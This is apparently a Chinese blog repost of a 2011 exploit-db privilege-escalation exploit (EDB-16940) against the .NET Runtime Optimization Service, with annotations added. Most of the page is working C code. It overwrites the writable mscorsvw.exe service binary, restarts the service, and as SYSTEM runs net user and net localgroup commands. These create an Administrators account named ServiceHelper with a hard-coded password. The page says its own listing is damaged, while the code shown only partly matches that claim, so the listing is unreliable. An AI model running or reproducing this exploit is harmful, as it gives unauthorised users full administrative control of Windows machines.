.NET Runtime Optimization Service 提权 0day（EDB-16940；针对 v2.0.50727 的 mscorsvw.exe，作者在 Windows XP SP3、2003 R2、Win7 上测试通过）

ps: exploit-db 上的原版可以一次编译成功，不用改……但注意本页转载的代码在排版时已损坏（类型与标识符之间的空格丢失，如 intmain、intargc；ServiceMain 的服务注册部分和 ControlHandler 的定义缺失；各函数缺少右大括号），编译请以原文为准：
http://www.exploit-db.com/exploits/16940/
exploit-db比较厚道的,不在编译上难为小菜啦……
/* 
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation 
# Date: 03-07-2011 
# Author: XenoMuta <xenomuta@tuxfamily.org> 
# Version: v2.0.50727 
# Tested on: Windows XP (sp3), 2003 R2, 7 
# CVE : n/a 
    _  __                 __  ___      __ 
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _ 
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ 
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ / 
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/ 
 xenomuta [at] tuxfamily.org 
 xenomuta [at] gmail.com 
 http://xenomuta.tuxfamily.org/ - Methylxantina 256mg 
 This one's a no-brainer, plain simple: 
 This service's EXE file can be overwritten by any non-admin domain user 
 and local power users ( which are the default permissions set ). 
 This exploit compiles to a service that uses the original service's id. 
 Tested on Windows 2003, WinXP (sp3) and Win7  
 ( my guess is that it runs on any win box running this service ). 
 greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!! 
 bless y'all! 
*/ 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
/* Status record reported to the SCM and the handle SetServiceStatus()
 * reports through. hStatus is declared here but is not assigned anywhere
 * in the listing reproduced on this page. */
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE   hStatus;
/* Target service (.NET 2.0 x86 runtime optimisation service).
 * PWN_EXE  - binary main() renames to "<PWN_EXE>.bak" and replaces with a
 *            copy of itself; hard-coded to c:\WINDOWS, so a non-default
 *            system root is not handled.
 * PWN_SHORT - defined but unused in the visible code.
 * PWN_NAME - display name passed to "net start".
 * PWN_ID   - service name the replacement registers with the SCM. */
#define PWN_EXE     "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT   "mscorsvw.exe"
#define PWN_NAME    ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID      "clr_optimization_v2.0.50727_32"
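/* Forward declarations. ControlHandler is declared here but its definition
 * is not part of the listing on this page; InitService is defined below. */
void ControlHandler(DWORD request);
int  InitService(void);

/*
 * ServiceMain - called by the SCM on its own thread once the swapped-in
 * binary is started as service PWN_ID (see main()). Runs the InitService
 * payload and reports the outcome to the SCM.
 *
 * The SCM invokes this with the LPSERVICE_MAIN_FUNCTION signature
 * (WINAPI, DWORD argc, LPSTR *argv); declaring it that way instead of
 * (int, char **) keeps the calling convention correct on 32-bit builds,
 * where the function-pointer cast in main() otherwise hides a
 * stdcall/cdecl mismatch.
 * argc/argv: arguments passed by the SCM; unused.
 *
 * NOTE(review): as reproduced on this page the function is cut. Nothing in
 * the visible listing initialises ServiceStatus or assigns hStatus - the
 * RegisterServiceCtrlHandler(PWN_ID, ControlHandler) call a service needs
 * before its first SetServiceStatus() is missing - so, as written, the
 * status reports below go through a null handle and fail. Restore that
 * part from the exploit-db original before building from this page.
 */
void WINAPI ServiceMain(DWORD argc, LPSTR *argv) {
    (void)argc;
    (void)argv;

    /* Non-zero from InitService means the payload failed: tell the SCM the
     * service stopped with a non-zero exit code rather than claim success. */
    if (InitService()) {
        ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = (DWORD)-1;
        SetServiceStatus(hStatus, &ServiceStatus);
        return;
    }

    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);
}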
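/*
 * main - two-stage entry point of the exploit.
 *
 * Stage 1 (run interactively, i.e. the account name is not "SYSTEM"):
 * rename the real service binary PWN_EXE to "<PWN_EXE>.bak", copy this
 * executable into its place and ask the SCM to start the service. This
 * only works because PWN_EXE is writable by the calling account (the
 * header describes that as the default DACL); a tightened DACL makes the
 * rename fail and the program exits with status 1.
 *
 * Stage 2 (started by the SCM, account name "SYSTEM"): hand PWN_ID to
 * StartServiceCtrlDispatcher so that ServiceMain, and through it the
 * InitService payload, runs under the service account.
 *
 * Host artefacts stage 1 leaves behind: the ".bak" copy of the original
 * mscorsvw.exe beside the replaced one, plus whatever InitService creates.
 *
 * argc/argv: argv[0] is used only as a fallback source path when the
 * module path cannot be queried.
 * Returns 0; exit(1) on any failure in stage 1.
 */
int main(int argc, char **argv) {
    char  acUserName[100];
    DWORD nUserName = sizeof(acUserName);
    (void)argc;

    /* On failure GetUserNameA leaves the buffer untouched; make sure the
     * comparison below sees a string, not uninitialised stack bytes. */
    if (!GetUserNameA(acUserName, &nUserName)) {
        acUserName[0] = '\0';
    }

    if (strcmp(acUserName, "SYSTEM") != 0) {
        /* ---- stage 1: interactive ---- */
        char  self[MAX_PATH];
        char *buf = (char *)malloc(2048);
        if (buf == NULL) {
            fprintf(stderr, " :(  out of memory.\n");
            exit(1);
        }
        memset(buf, 0, 2048);

        /* argv[0] need not be a full path (it is whatever the shell typed);
         * the module path is what CopyFile actually needs. */
        if (GetModuleFileNameA(NULL, self, sizeof(self)) == 0) {
            snprintf(self, sizeof(self), "%s", argv[0]);
        }

        snprintf(buf, 2048, "%s.bak", PWN_EXE);
        if (rename(PWN_EXE, buf) != 0) {
            /* Most likely the file is not writable by this account. */
            fprintf(stderr, " :(  sorry, can't write to file.\n");
            free(buf);
            exit(1);
        }

        /* bFailIfExists is TRUE: the rename just cleared the path, so an
         * existing file here means something else got there first. */
        if (!CopyFileA(self, PWN_EXE, TRUE)) {
            fprintf(stderr, " :(  could not copy %s to %s (error %lu); %s remains.\n",
                    self, PWN_EXE, (unsigned long)GetLastError(), buf);
            free(buf);
            exit(1);
        }

        snprintf(buf, 2048, "net start \"%s\" 2> NUL > NUL", PWN_NAME);
        /* Printed before the service is started: it states the intent, not
         * a confirmed result - check the account afterwards. */
        printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
        system(buf);
        free(buf);

        /* Not running under the SCM: StartServiceCtrlDispatcher would only
         * fail with ERROR_FAILED_SERVICE_CONTROLLER_CONNECT, so stop here. */
        return 0;
    }

    /* ---- stage 2: started by the SCM as SYSTEM ---- */
    SERVICE_TABLE_ENTRYA ServiceTable[2];
    ServiceTable[0].lpServiceName = PWN_ID;
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)ServiceMain;
    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;
    StartServiceCtrlDispatcherA(ServiceTable);
    return 0;
}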
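/*
 * InitService - the payload, executed by ServiceMain under the service
 * account: creates a local user "ServiceHelper" and adds it to the local
 * Administrators group via "net user" / "net localgroup". The two commands
 * are chained with "&", so the group add runs even if the user add failed
 * (e.g. the account already exists).
 *
 * Defender note: a new local administrator named ServiceHelper, created
 * with a cleartext password on a command line, is the durable artefact of
 * a successful run.
 *
 * Returns 0 so that ServiceMain reports SERVICE_RUNNING (ServiceMain treats
 * any non-zero value as failure). NOTE(review): the listing on this page is
 * cut after the system() call, so the original function's return value is
 * not visible here.
 */
int InitService(void) {
    system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
    return 0;
}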

posted on 2011-04-27 03:31  小宝哥哥  阅读(434)  评论(0编辑  收藏  举报
